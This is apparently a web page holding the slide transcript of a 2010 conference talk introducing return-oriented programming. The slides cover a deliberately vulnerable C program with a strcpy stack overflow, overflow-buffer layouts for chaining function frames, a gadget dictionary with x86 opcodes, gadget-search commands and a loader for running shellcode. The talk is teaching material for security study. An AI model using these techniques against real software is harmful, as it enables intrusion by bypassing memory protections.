Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
FPGA_Logic.pdf
FPGA_Logic.pdfFPGA_Logic.pdf
FPGA_Logic.pdf
 
Load-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADLoad-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOAD
 
System design using HDL - Module 3
System design using HDL - Module 3System design using HDL - Module 3
System design using HDL - Module 3
 

More from Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
Saumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Saumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Saumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
Saumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
Saumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
Saumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Saumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
Saumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
Saumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
Saumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
Saumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
Saumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
Saumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
Saumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
Saumil Shah
 

More from Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Recently uploaded

The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
g2nightmarescribd
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 

Recently uploaded (20)

The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 

An introduction to ROP

  • 1. net-square Introduction to ROP a first look at return oriented programming Saumil Shah, Net-Square Hack.LU 2010 - Luxembourg
  • 2. net-square Introduction • DEP • EIP control • Ret2LibC • Return Oriented Programming
  • 3. net-square DEP • Hardware enforced (NX). • Data areas marked non-executable. – Stack marked non-executable. – Heap marked non-executable. • You can load your shellcode in the stack or the heap... • ...but you can't jump to it.
  • 4. net-square EIP control • Stack - forbidden • Heap - forbidden • Binary - OK • DLLs - OK Program Image Heap Stack DLL DLL DLL
  • 5. net-square Ret2LibC • Return to LibC. • Pioneered by Solar Designer in 1997. • EIP made to "return to a function". • Need control of the stack memory. – We usually have it.
  • 6. net-square Ret2LibC - how does it work? • Create a fake frame on the stack. • After an overflowed function returns... • ...set the EIP return address to the new function. • Append the fake frame. • New function executes. – parameters consumed from the fake frame. • system("/bin/sh")
  • 7. net-square Return Oriented Programming • Series of function returns. • Chained frames. • Transform EIP based primitives into stubs that can be "returned into". • ESP is the new EIP!
  • 8. net-square Topics • Function calls and returns • Stack overflows revisited • Creating stack frames • Chaining frames • ESP control
  • 9. net-square Calling a function • Add two ints x, y. • add(3,4) • What does the calling frame look like? void add(int x, int y) { int sum; sum = x + y; printf("%dn", sum); } int main() { add(3, 4); }
  • 10. net-square Stack frame for add(3,4) frame for add() return address from add() 3 4 call add
  • 11. net-square Return from add(3,4) • add() is about to return. • RET after epilogue of add(). • Where does ESP point to? – immediately before the RET • What does the stack look like?
  • 12. net-square Before the RET return address from add() 3 4 ESP
  • 13. net-square Another function • Stack overflow in func1. • Can we call add(5, 6) after returning from func1? void func1(char *s) { char buffer[128]; strcpy(buffer, s); } int main() { func1(argv[1]); }
  • 14. net-square Stack frame for func1() buffer return address from func1 s
  • 15. net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA
  • 16. net-square Before the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA ESP
  • 17. net-square After the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA EIP = 0x41414141 ESP
  • 18. net-square Return to add() • Insert a fake frame in the buffer. • Make func1() return to: add(01010101, 02020202) • What does the stack frame look like?
  • 19. net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202
  • 20. net-square Before func1() returns buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP
  • 21. net-square Return to add() buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP EIP = add()
  • 22. net-square Return to add() • By carefully creating a frame... • ...we can make the program "return to our function". • We control the parameters. • We also control where to jump to after our function returns.
  • 23. net-square victim2.c int main(int argc, char *argv[]) { add(3, 4); func1(argv[1]); } void func1(char *s) { char buffer[128]; strcpy(buffer, s); } void print_hello(void) { printf("Hello Worldn"); } void add(int x, int y) { int sum; sum = x + y; printf("%d + %d = %dn", x, y, sum); } stack overflow lurks here!
  • 24. net-square victim2.c • Compile victim2.c • Run victim2 under a debugger • Study the stack frame before add(3, 4) gcc victim2.c -o victim2 gdb victim2
  • 25. net-square gdb'ing add • Set a breakpoint before add(3, 4) 0x804836c <main>: push %ebp 0x804836d <main+1>: mov %esp,%ebp 0x804836f <main+3>: sub $0x8,%esp 0x8048372 <main+6>: and $0xfffffff0,%esp 0x8048375 <main+9>: mov $0x0,%eax 0x804837a <main+14>: sub %eax,%esp 0x804837c <main+16>: sub $0x8,%esp 0x804837f <main+19>: push $0x4 0x8048381 <main+21>: push $0x3 0x8048383 <main+23>: call 0x80483de <add> 0x8048388 <main+28>: add $0x10,%esp 0x804838b <main+31>: cmpl $0x1,0x8(%ebp)
  • 26. net-square Stack frame before add(3, 4) • Dump the stack • Continue (gdb) x/64 $esp 0xbffff8ac: 0x08048388 0x00000003 0x00000004 0xbffff8c8 0xbffff8bc: 0x0804841c 0x40148f50 0x40012780 0xbffff8e8 0x08048388 3 4
  • 27. net-square Overflowing func1() • Overflow func1 and... ...return to add(01010101, 02020202) • Create a fake frame. • Overwrite stack. • frame1.pl return from func1 param1 param2 return from add 0x080483de 0x01010101 0x02020202 0x42424242
  • 28. net-square frame1.pl • Creates the overflow buffer as follows: • Set this in an environment variable EGG and run victim2 with $EGG: 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 distance to EIP address of add return from add param1 param2 export EGG=`./frame1.pl` gdb victim2 (gdb) run $EGG
  • 29. net-square ESP • Where will ESP be after returning from add? • Verify 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 (gdb) x/64 $esp 0xbffff824: 0x01010101 0x02020202 0x08048400 0x40148f50 0xbffff834: 0x40012780 0xbffff858 0x4002e7f7 0x00000002 ESP
  • 30. net-square Chaining functions • After add(01010101, 02020202), we want to run add(03030303, 04040404). • How should we set up the frames? • First, study the frame after add() returns.
  • 32. net-square Where does the new frame go? AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA address of add 42424242 01010101 02020202 address of add ?? 03030303 04040404
  • 33. net-square Where does the new frame go? • We get only ONE chance at strcpy. • How do we preserve params 01010101 and 02020202? • We can only APPEND the second frame below our first frame. • We have to UNWIND the first frame before returning to the second frame. • Return to epilogue!
  • 34. net-square Chaining the frames AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 add(01010101, 02020202) add(03030303, 04040404)
  • 35. net-square Keeping ESP in control AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 Return from func1 Return to add() Return to POP/POP/RET POP POP ESP RET - Return to add() Finally EIP = 0x42424242
  • 36. net-square frame2.pl • Creates the overflow buffer as follows: 080483deAAAAAA...140...AAAAAA 0804843d 01010101 02020202 distance to EIP address of add POP/POP /RET param1 param2 080483de 42424242 03030303 04040404 address of add return from add param1 param2 Use msfelfscan to find the address of POP/POP/RET from victim2 binary.
  • 37. net-square frame2.pl • Set this in an environment variable EGG and run victim2 with $EGG: export EGG=`./frame2.pl` gdb victim2 (gdb) run $EGG Starting program: /home/user0/victim2 $EGG 3 + 4 = 7 1010101 + 2020202 = 3030303 3030303 + 4040404 = 7070707 Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? ()
  • 38. net-square It's all about ESP! • ESP is the new EIP. • ROP involves keeping the ESP moving through the frames on the stack. • Frames can be chained by returning to epilogues of functions. – to appropriately unwind the parameters pushed on the stack. • We must never lose sight of RET.
  • 39. net-square ROP frames - generic approach f1(A, B) f2(X) f1(C, D) f3(P, Q, R, S) f2(Y) : : & f1() & POP/POP/RET A B & f2() & POP/RET X & f3() & POPAD/RET P Q R & f1() & POP/POP/RET C D junk junk junk & f2() & POP/RET Y S
  • 40. net-square Topics • Transforming classic EIP code to ROP • ROP vs. classic programming • Thinking in ROP terms • Assembling frames • Gadgets • Searching for gadgets • Generic techniques
  • 41. net-square EIP vs. ESP Classic EIP code • N ops = N instructions. • EIP increments. • ESP fluctuates. • The CPU increments EIP automatically. ROP code • N ops = N frames. • ESP increments. • EIP fluctuates. • We have to control ESP through RET instructions.
  • 42. net-square Transform EIP code to ROP • Load two registers • Call a function – with params 3,4 • How does this translate in ROP terms? mov eax, 14 mov ecx, 02500000 push 3 push 4 call 77fe3210
  • 43. net-square Thinking in ROP terms ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 ESP Put 14 in the next stack word, and POP it into EAX. RET function body epilogue prologue vulnerable function EIP mov eax, 14 RET POP EAX POP EBX functionX 700344fe 700344fd 700344ff
  • 44. net-square Thinking in ROP terms 700344fe AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14ESP RET function body epilogue prologue vulnerable function EIP Jump to address of "POP EAX; RET". Search function epilogues. RET POP EAX POP EBX functionX mov eax, 14
  • 45. net-square Thinking in ROP terms 700344fe ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ESP RET function body epilogue prologue vulnerable function EIP Place 02500000 as the next stack word, to be loaded into ECX. RET POP EAX POP EBX functionX eax = 00000014 mov ecx, 02500000
  • 46. net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 RET function body epilogue prologue vulnerable function We now need an address of a "POP ECX; RET" sequence. RET POP EAX POP EBX functionX RET POP ECX functionY ESP EIP eax = 00000014 mov ecx, 02500000 6d894430 6d894431
  • 47. net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000ESP RET function body epilogue prologue vulnerable function 02500000 is popped into ECX. RET POP EAX POP EBX functionX EIP RET POP ECX functionY eax = 00000014 mov ecx, 02500000
  • 48. net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ??ESP RET function body epilogue prologue vulnerable function We now need to call a function at 77fe3210, with parameters 3, 4 RET POP EAX POP EBX functionX EIP RET POP ECX functionY push 3; push 4; call 77fe3210 eax = 00000014 ecx = 02500000
  • 49. net-square Gadget Dictionary POP EAX; RET Load value into register value POP ECX; RET Read memory at address address ADD EAX,n; RET Add MOV EAX,[ECX]; RET POP EAX; RET Write value at address address POP ECX; RET value MOV [EAX],ECX; RET INC EAX; RET Increment address of function Call a function param cleanup param 1 param 2 RET NOP param N POP; POP ... RET ADD ESP,24; RET POPAD; RET POP EAX; RET Call a function pointer address CALL [EAX]; RET XCHG EAX,ESP; RET Stack flip ESP=EAX LEAVE; RET Stack flip ESP=EBP POP ESP; RET Stack flip ESP=addr address
  • 50. net-square Instruction Opcodes Instruction Opcodes RET C3 RET n C2 16bits POP EAX 58 POP ECX 59 MOV EAX,[ECX] 8B 01 MOV [EAX],ECX 89 08 MOV [ECX],EAX 89 01 INC EAX 40 ADD EAX, n 83 C0 8bits
  • 51. net-square Instruction Opcodes Instruction Opcodes POP EBX/EDX/ESI/EDI/EBP 5B/5A/5E/5F/5D POPAD 61 ADD ESP,24 83 C4 18 CALL [EAX] FF 10 XCHG EAX,ESP 94 LEAVE C9 (mov esp,ebp; pop ebp) POP ESP 5C
  • 52. net-square Searching for Gadgets • Use msfpescan's regex search. • Example: MOV EAX,[ECX]; RET msfpescan -D -r 'x8Bx01xC3' <file> msfpescan -D -r 'x8Bx01xC2.x00' <file> msfpescan -D -r 'x8Bx01.xC3' <file> msfpescan -D -r 'x8Bx01..xC3' <file> • Sometimes you may need to improvise.
  • 53. net-square Generic Techniques • Run arbitrary shellcode. • Difficult to transform entire shellcode to ROP frames. • Create a ROP loader: – Allocate RWX memory – Copy classic shellcode to this memory – Jump to shellcode • Load and run any shellcode.
  • 54. net-square DEMO TIME! • Java JNLP docbase overflow • Exploiting IE8 using ROP